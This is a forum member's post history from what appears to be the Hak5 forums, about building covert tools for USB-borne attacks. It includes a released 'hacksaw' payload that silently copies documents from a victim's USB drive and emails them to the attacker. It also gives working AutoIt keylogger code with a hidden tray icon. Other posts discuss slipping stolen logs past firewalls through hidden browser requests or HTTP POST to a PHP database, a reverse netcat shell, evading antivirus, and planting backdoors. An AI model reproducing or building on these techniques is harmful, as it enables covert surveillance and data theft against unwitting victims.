sc0rpi0
-
Posts
138 -
Joined
-
Last visited
Posts posted by sc0rpi0
-
-
there are many ways to get the log file out but i kinda prefer the gmail method using auotIT because you dont have to use any external programs... Any normal hardware firewall should allow you email access the problem that your talking about is in regards to software firewalls which you should probably disable before running this payload anyways... with a method like the av killer programs...
I have McAfee (and so do most the people I know).
I know for a fact that most people *do not* use hardware firewalls.
McAfee firewall blocks all attempts made by the autoit program.
I have made numerous attempts to "disable" my McAfee firewall (processkilling, etc).
The only thing left would be to permanently disable the program (leaving massive tracks).
The best solution is to bypass the firewall using a commonly used universal program (hence internet explorer).
-
Ok, ok, ok... I was seeing it at now...
I know the fact to have your compiled version for the payload is better to hide your fingertips because you are compiling the mail account name and password into the same exe file but, what about doing it in the MySQL+PHP way that was written in this same forum? By the way, it assures the bypass for any router because it does the stuff using port 80.
how about doing the php log transfer thing with autoit?
When most programs are run, whether using php or smtp, they always trigger a question from decent firewalls.
DO YOU WANT THIS PROGRAM TO ACCESS THE INTERNET?
I think I have found a way to bypass this completely.
Autoit has a way of accessing webpages in the backround with ie...which is typically already allowed internet access.
Using this method and php, logs can be transferred without any kind of interruption.
I have most of the stuff already coded in autoit--i am currently working out the bugs.
-
you cant really make netcat undetectable... but its easy enought to write a netcat clone in autoIT or python...
cool! if you have developed anything like this, please PM me the autoit code.
Thanks.
-
i was just using a reverse netcat shell
if you were planning on writing the keylogger in autoIT you might want to rethink it... it eats up to much cpu
really? the one i use in autoIT works perfectly fine...i haven't noticed any cpu shortages (and my computer is not that good). the keylogger uses the hotkey feature.
do you know how to make netcat undetectable? most antvirus applications are extremely hostile to it.
i don't like using avkillers and 99% of packers are detected.
i thought of hex-editing, but gave up after an hour of trying.
-
cool work... i released my code for my autoIT switchblade... i dont know if theres anything you wanted to use from it.. My code is kinda noobish but i liked the idea of autoIt cause its a bit better then batch scripts... there was also someone on here who realeased some code for a self extracting autoIT payload that uses Fileinstall to include all the files into one exe...
yeah...autoit is kindof noobish in general...but much better than batch (in my humble opinion).
The autoIT payload looks great. It should help clean up and expand my payload.
Fileinstall is pretty good in general. Occasionally, I receive errors while using it.
Eventually, I hope to expand my payload to include:
-backdoor which works through firewalls (partly successful--the output doesn't always bounce back)
-keylogger (almost finished)
-self propagating hacksaw (work in progress).
-
A method could be to change all the files to .txt and pass them to a php script which whould save them
Not a bad idea! Thanks.
-
SCORPIO HACKSAW PAYLOAD BETA 1.0
By now, the current hacksaw is utterly useless without some kind of av killer because the primary program (usb dumper) is detected and automatically deleted by antivirus.
So, I have coded up a new version of usb dumper in autoit.
In case it eventually becomes detected, I have included all source as well as binary.
You can use the current binary or compile it with autoit here:
http://www.autoitscript.com/autoit3/downloads.shtml
INSTRUCTIONS
1. change the the info in config.ini to your own information.
from=example@gmail.com (put in your own gmail account)
to=example@gmail.com (put in your own gmail account)
username=exampleusername (put in just your username)
password=examplepassword (put in your password)
2. If you would like, modify the file extensions in config.ini to those which you would like collected from a target usb drive (or just leave the current ones).
ext1=.txt
ext2=.doc
ext3=.xls
3. Run go.bat
Please PM me any problems/concerns/questions.
If anyone has an idea of how to upload files (other than ftp or email), please notify me.
I don't think sql would work...because its not text data.
DOWNLOAD HERE: http://www.mediafire.com/?gymdtgsmroj[/font]
-
Hardware firewalls block all incoming connections by default.. You specify what incoming ports you want open to what computers are running servers(port forwarding)
Software firewalls are what you have to worry about... They block outgoing connections as well!
Sending email is a no no as most anti-virus / software firewalls detect it and show the contents of the email being sent and to allow it or not.
FTP? nah you don't want to embed your login and password into a program...
So what is a good way thats undetectable and will work even if both software and hardware firewalls are in place?
HTTP POST.
Even if you have a software and hardware firewall, chances are you aren't going to block port 80 outgoing. Its needed for basic web functionality. You wouldn't be able to browse the web if it was blocked.
All thats required is a free web host which offers php + mysql. You have a program read the log file and post the data to a server sided php script. The script then inserts the data into the database ;)
You probably haven't seen it since its on the low on the second page now.
http://hak5.org/forums/index.php?showtopic=9644
Its almost guaranteed that port 80 is open, and its the most undetectable method. Therefore I think it's the best way
this sounds pretty cool. the only problem is that it's over my head (i don't know a thing about php nor sql).
I was also looking at the form making tool provided in google docs. when a form is filled out, the contents are uploaded to the owner's account. Is there a way to automate inputting text into an online form?
Thanks for your help.
-
Does anybody know if most firewalls block tcp by default?
I was wondering if it might be a possibility for transferring switchblade logs.
Thanks.
-
I fixed two missing spaces. I was trying to format the code to look pretty and probably broke it. (FILE *fp=NULL; LPVOID pBuf=NULL;)
haha
To sc0rpi0: I'm not sure if I made it clear enough before... when you run this, you don't have to push print screen... it does it automatically and saves out a bitmap file.
In fact, if you wanted an all-in-one tool to save the contents of clipboard to a file, THEN grab a screenshot, you can insert some code to grab from the clipboard right before it does the key-down/key-up events on the Printscreen button.
I just wish I had a compiler available so I could fix it up and build it.
sorry...my miscommunication.
I was talking about the script *I* was trying to make.
In my script, I worked out a way to automate the Printscreen button but can't figure out a way to
intercept the shot from the clipboard. I am using autoit (a noob script language) for this.
-
do you mean screenshot or video? if its screeshot use print screen. If video i think fraps has a free version right?
I am assuming you are doing the remotely since you dont want to install it tho ;)
1. screenshot (must be automated though---printscreen is not---i coded up a way to automate the printscreen button
but can't figure out how to automatically retrieve the screenshot from the clipboard
2. Yes, I am designing this to be remotely done
-
Visual Studio 2008 C# Solution: http://naturalorange.net/uploads/scrnshot_source.zip
Its very simple, less than 15 lines. Mostly I just modified another project to work on the command line.
If you don't have Visual Studio, you can just open the main progam.cs file.
Possible Features for the future would be adding a watermark to the image.
--------------------------------------------------------------
I'm working on a project that would copy anything from the clipboard to a file. Text/Image/Sound/Files.
It's not working yet but I'm looking into it.
If it's not too much trouble, please send me a copy too!
-
if its on vista you can use the "clip" command to send things to or from the clipboard (text).
You could probably make an app in c++ or c# pretty quickly using the windows API's.
I could make one in c# for you but it would require .NET 2.0 at least.
I made one. get it here http://naturalorange.net/uploads/scrnshot.zip
If you just run the exe, it will create a screenshot in the format year_month_day_hour_minute_second.png. Otherwise specify the name you want to use (scrnshot.exe filename.png). It requires .NET 2.0 framework. But no installation is needed.
thanks a bunch. this is exactly what i was looking for.
could i possibly get the source so that i can use it in future projects?
besides, i am kind of paranoid about executables that aren't either compiled by me or from an opensource website.
despite that you are one of the last people i would be wary of, i can never take safety too far.
-
Look for something alternative to snag it. There are free ones out there.
Try this: http://www.shup.com/
that needs installation (sorry, i forgot to mention that i don't want an app that needs install) and requires using the gui to take a screenshot.
RELATED QUESTION #2:
Does anyone know how to dump the contents (text, pictures, etc) of the clipboard to a directory using either the
command prompt or a 3rd-party program?
thanks.
-
i dont know for sure but judging by his last topic i think he wants a command line utility that when called will take a screenshot of the current screen.
seems like hes trying to automate something.
that is correct. i do not want to copy text out of cmd but to take a screenshot of the current screen.
-
does anyone know of a free, command-line screenshot utility for windows?
much appreciated.
-
thanks a bunch
-
do you mean a running window? or do you want to hide a window like if you used an old batch syslog and the dos window doesn't close and what you want to do is close the dos window. is that right?
yes, i want to hide a running window---not a dos window.
-
does anyone know a way to hide an already existent window (preferably without using a gui)?
i know i can use nircmd to run a program and hide its window, but this isn't the problem.
i want to hide a window of a program that has already been run.
thanks very much.
-
i'm sorry if i miscommunicated.
I am not attempted to "break into" a remote computer (gain access remotely) but to establish a "backdoor"
so that a computer can be accessed later. perhaps i am mistaken, but doesn't vnc need to make registry changes to
operate?
thanks.
-
Question 1: is possible to remotely access a machine without admin privileges (regedits etc.)?
if so...
Question 2: any recommendations concerning programs which are capable of doing this?
much appreciated
-
Hmm, while I don't admire turning others over to the authorities, maybe deleting all the files and talking to the guy would have been a better approach, its never good, and you should never be proud to get someone else into trouble (unless is some realllllly bad).
It seems to me that if you both watch hak5, you'd prbly get along. It just sounds to me like an opportunity to make a friend, rather then completely fuck up some other kid's life.
I agree! Very well put.
-
I know this is a very strange question, but how would I go about converting a long line of vertical text to
a horizontal format using something like a batch file?
For example, I want to convert this:
a b c d e f g h
...to this:
abcdefgh
Thanks very much.
-
I've had decent experience with dell mainly in a corporate environment. A lot of that is due to their amazing support if you're willing to pay for it.
I had an apple briefly and loved the build quality.
My asus eee PC is the most awesome notebook I've ever owned but is nowhere near as "solid" as a macbook pro.
So, do you mean "solid" as in quality of physical build or software or both?
Can the macbook pro boot a backtrack CD?
ok getting started...a keylogger
in Security
Posted
actually, i have made quite a good keylogger that has zero CPU usage.
don't use lspressed...it's WAY too slow...around 100 CPU. Use hotkey.
i won't all post the code now because it is too long, but here is the gist:
#NoTrayIcon Global $log = "" HotKeySet ( "{a}" , "_a" ) While 1 sleep( 60000 ) Fileopen( 1, "log.txt" ) Filewrite( "log.txt", $log ) Fileclose( "log.txt" ) WEnd Func _a() HotKeySet ( "{a}") send("{a}") $log = $log & "a" HotKeySet ( "{a}" , "_a" ) EndFuncthis only logs when "a" is pressed.
all you have to do is add in the other keys are you should be golden.